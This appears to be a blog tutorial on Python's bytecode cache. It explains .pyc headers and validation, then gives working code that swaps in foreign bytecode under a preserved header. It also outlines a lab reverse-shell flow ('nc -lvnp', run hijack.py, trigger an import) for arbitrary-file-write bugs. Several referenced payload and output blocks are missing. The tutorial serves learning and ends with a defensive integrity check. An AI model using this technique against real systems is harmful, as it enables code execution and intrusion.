Python Bytecode Cache Hijacking: A Deep Dive into __pycache__
If you've been writing Python for a while, you've probably noticed those mysterious __pycache__ folders popping up everywhere in your projects. I never really paid much attention to them until recently, when I started wondering: what exactly happens inside these folders, and more importantly, can they be exploited?
What's Actually Going On With __pycache__?
Let me break this down in simple terms. When you run Python code, your source files don't just get executed directly. Instead, the Python interpreter goes through several stages:
Lexing - Breaking your code into tokens
Parsing - Building an Abstract Syntax Tree (AST)
Compiling - Converting the AST into bytecode
Execution - Running the bytecode in Python's Virtual Machine
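To make those stages a bit more tangible, here's a rough sketch that walks a tiny snippet through each one using standard-library modules. The variable names (source, tokens, tree, code, namespace) are just for illustration, and the real interpreter does all of this internally rather than through these modules.

```python
import ast
import dis
import io
import tokenize

source = 'def hello():\n    print("hello world!")\n'

# 1. Lexing: split the source text into tokens.
tokens = list(tokenize.generate_tokens(io.StringIO(source).readline))

# 2. Parsing: build an abstract syntax tree from the source.
tree = ast.parse(source, filename="test.py")

# 3. Compiling: turn the AST into a code object that holds the bytecode.
code = compile(tree, filename="test.py", mode="exec")

# 4. Execution: run the bytecode; this defines hello() inside `namespace`.
namespace = {}
exec(code, namespace)

print([tok.string for tok in tokens[:3]])  # the first few tokens
print(type(tree.body[0]).__name__)         # top-level AST node type
dis.dis(code)                              # human-readable bytecode listing
namespace["hello"]()                       # call the function we just defined
```

The code object produced in step 3 is what ends up serialized inside a .pyc file.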
Now here's the clever part: Python doesn't want to do all this work every single time you import a module. So it caches the compiled bytecode in .pyc files inside the __pycache__ directory. This makes subsequent imports much faster since Python can skip the lexing, parsing, and compilation stages entirely.
Let's say you have a simple setup like this:
# main.py
import test
test.hello()
# test.py
def hello():
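    print("hello world!")
When you run main.py for the first time, Python compiles test.py and writes the bytecode to a file such as __pycache__/test.cpython-312.pyc (the exact tag depends on the interpreter version).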
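You can also ask Python itself where that cached file lives instead of guessing. A small sketch, assuming the module file is called test.py as in the example above:

```python
import importlib.util
import sys

# Where the import system would cache the bytecode for test.py.
cache_path = importlib.util.cache_from_source("test.py")
print(cache_path)

# The tag embedded in the filename identifies the interpreter.
print(sys.implementation.cache_tag)

# A different optimization level maps to a differently named cache file.
optimized_path = importlib.util.cache_from_source("test.py", optimization=1)
print(optimized_path)
```

The file does not need to exist for this call to work; it only computes the path.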
When Does Python Recompile?
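Python isn't just blindly using cached files forever. Before trusting a .pyc file, the import system validates it against the source:
Has the source file's modification time changed? (default, timestamp-based caches)
Has the source file's size changed? (default, timestamp-based caches)
Has the source file's hash changed? (only for hash-based caches, which are opt-in)
Is the magic number different (usually from a Python version change)?
Is a different optimization level in use? (this selects a differently named cache file, such as .opt-1.pyc, rather than invalidating the existing one)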
If any of these checks fail, Python recompiles and overwrites the cache. But what if we could bypass these checks?
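Before trying that, it helps to see how little the default check actually compares. Here's a rough re-implementation of the timestamp-based validation. The function name cache_is_fresh and the demo_mod.py module are made up for illustration; the real logic lives inside importlib and also handles hash-based caches, which this sketch skips.

```python
import importlib.util
import os
import py_compile
import struct
import tempfile


def cache_is_fresh(source_path, pyc_path):
    """Approximate the default (timestamp-based) validation of a .pyc file."""
    with open(pyc_path, "rb") as f:
        header = f.read(16)
    if len(header) < 16 or header[:4] != importlib.util.MAGIC_NUMBER:
        return False  # truncated, or written by a different Python version
    (flags,) = struct.unpack("<I", header[4:8])
    if flags & 0b1:
        raise NotImplementedError("hash-based .pyc files are not handled here")
    mtime, size = struct.unpack("<II", header[8:16])
    stat = os.stat(source_path)
    # Both values are stored as 32-bit unsigned integers in the header.
    return (mtime == (int(stat.st_mtime) & 0xFFFFFFFF)
            and size == (stat.st_size & 0xFFFFFFFF))


with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "demo_mod.py")
    with open(src, "w") as f:
        f.write('def hello():\n    print("hello world!")\n')
    pyc = py_compile.compile(
        src, doraise=True,
        invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
    )
    fresh_before = cache_is_fresh(src, pyc)
    with open(src, "a") as f:
        f.write("# edited\n")  # changes the size, so the cache is now stale
    fresh_after = cache_is_fresh(src, pyc)

print(fresh_before, fresh_after)
```

Notice that nothing in this check looks at the bytecode itself; only the header is compared against the source file's metadata.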
The Hijacking Experiment
Here's where things get interesting. I started wondering: what if I manually overwrote a .pyc file with my own bytecode? Would Python execute my code instead of the original?
Spoiler alert: yes, it absolutely does.
Understanding the .pyc File Format
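First, I needed to understand how these bytecode files are structured. For Python 3.7 and later, a .pyc file starts with a 16-byte header: a 4-byte magic number, a 4-byte flags field, and then either a 4-byte source timestamp plus a 4-byte source size (the default) or an 8-byte source hash. The marshalled code object follows the header.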
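To make the layout concrete, here's a small sketch that splits a .pyc file into its header fields and code object. The helper name split_pyc and the demo_mod.py module are hypothetical, and it assumes the Python 3.7+ layout with a 16-byte header.

```python
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile


def split_pyc(pyc_path):
    """Return the header fields and the unmarshalled code object of a .pyc."""
    with open(pyc_path, "rb") as f:
        data = f.read()
    (flags,) = struct.unpack("<I", data[4:8])
    info = {"magic": data[:4], "flags": flags}
    if flags & 0b1:
        # Hash-based cache: bytes 8..16 hold a hash of the source.
        info["source_hash"] = data[8:16]
    else:
        # Timestamp-based cache: 4-byte mtime followed by 4-byte source size.
        info["mtime"], info["source_size"] = struct.unpack("<II", data[8:16])
    info["code"] = marshal.loads(data[16:])
    return info


with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "demo_mod.py")
    with open(src, "w") as f:
        f.write('def hello():\n    print("hello world!")\n')
    pyc = py_compile.compile(
        src, doraise=True,
        invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
    )
    expected_size = os.path.getsize(src)
    info = split_pyc(pyc)

print(info["magic"] == importlib.util.MAGIC_NUMBER)
print(info["flags"], info["mtime"], info["source_size"])
print(info["code"].co_names)
```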
The strategy here is simple: keep the magic number, timestamp, and size the same as the original file so Python thinks nothing has changed, but replace the bytecode with our own malicious code.
The Proof of Concept
I wrote a quick script to hijack the bytecode. The key steps were:
Read the original .pyc file's header (magic, flags, timestamp)
Compile my own sneaky code
Write a new .pyc file with the original header but my bytecode
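Put together, those three steps look roughly like the sketch below. This is a simplified stand-in rather than the original script: it works inside a throwaway temp directory, uses a made-up module name (demo_target, to avoid clashing with the standard library's test package), and the payload only changes a return value.

```python
import importlib
import marshal
import os
import py_compile
import sys
import tempfile


def hijack(pyc_path, payload_source):
    """Keep the original 16-byte header and swap in a different code object."""
    with open(pyc_path, "rb") as f:
        header = f.read(16)  # magic, flags, timestamp, size
    code = compile(payload_source, "<payload>", "exec")
    with open(pyc_path, "wb") as f:
        f.write(header + marshal.dumps(code))


with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "demo_target.py")
    with open(src, "w") as f:
        f.write('def hello():\n    return "hello world!"\n')
    pyc = py_compile.compile(
        src, doraise=True,
        invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
    )

    # The source file is untouched; only the cached bytecode changes.
    hijack(pyc, 'def hello():\n    return "hijacked"\n')

    sys.path.insert(0, tmp)
    importlib.invalidate_caches()
    try:
        demo_target = importlib.import_module("demo_target")
        result = demo_target.hello()
    finally:
        sys.path.remove(tmp)
        sys.modules.pop("demo_target", None)

print(result)
```

The source on disk still says "hello world!", yet the import picks up whatever code object sits behind the preserved header.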
Here's what I compiled as the payload:
And here's what happened:
Before hijacking:
After hijacking:
Our malicious code executed! Instead of printing "hello world!", it ran the id command and showed my system user information.
Real-World Application: Weaponizing the Bytecode Cache
So what does this look like in a real penetration test? In web security, there's a vulnerability called "Arbitrary File Write" (AFW) where attackers can create or overwrite files on a server. While PHP folks abuse .htaccess files for RCE, Python applications have their own attack vectors.
Here's a real hijack script I used in a lab environment. This one deploys a reverse shell instead of just running id:
The attack flow is straightforward:
Set up a listener: nc -lvnp port
Run the hijack script: python hijack.py __pycache__/cache.pyc
Trigger the module import in a new process
Catch the reverse shell
The beauty of this technique is that it works even in restricted environments where you can't write .py files directly or execute arbitrary commands. As long as you can overwrite a .pyc file and trigger a module import in a fresh process, you're in.
Conclusion
What started as curiosity about those __pycache__ folders turned into a fascinating journey through Python's import system and some serious security implications. The bytecode cache, designed for performance optimization, becomes a powerful attack vector when combined with arbitrary file write vulnerabilities.
Remember, this technique works because Python trusts its own cache: it checks the header metadata but assumes the bytecode itself is legitimate. By preserving the original magic number, flags, timestamp, and size, we can slip malicious code right past Python's validation checks.
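To see that trust gap from the other side, here's a minimal sketch that compares a cached code object against a fresh compile of the source. The helper name cache_matches_source is hypothetical, and it assumes a 16-byte header and the same interpreter and optimization level that produced the cache.

```python
import marshal
import os
import py_compile
import tempfile


def cache_matches_source(source_path, pyc_path):
    """Recompile the source and compare it with the cached code object."""
    with open(source_path, "rb") as f:
        fresh = compile(f.read(), source_path, "exec", dont_inherit=True)
    with open(pyc_path, "rb") as f:
        cached = marshal.loads(f.read()[16:])  # skip the header
    return cached == fresh


with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "demo_mod.py")
    with open(src, "w") as f:
        f.write('def hello():\n    return "hello world!"\n')
    pyc = py_compile.compile(
        src, doraise=True,
        invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
    )
    clean = cache_matches_source(src, pyc)

    # Simulate tampering: same header, different code object.
    with open(pyc, "rb") as f:
        header = f.read(16)
    other = compile('def hello():\n    return "hijacked"\n', src, "exec")
    with open(pyc, "wb") as f:
        f.write(header + marshal.dumps(other))
    tampered = cache_matches_source(src, pyc)

print(clean, tampered)
```

The header is identical in both cases, so only a comparison of the code objects tells the two files apart.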
See ya tomorrow, Byte Byte!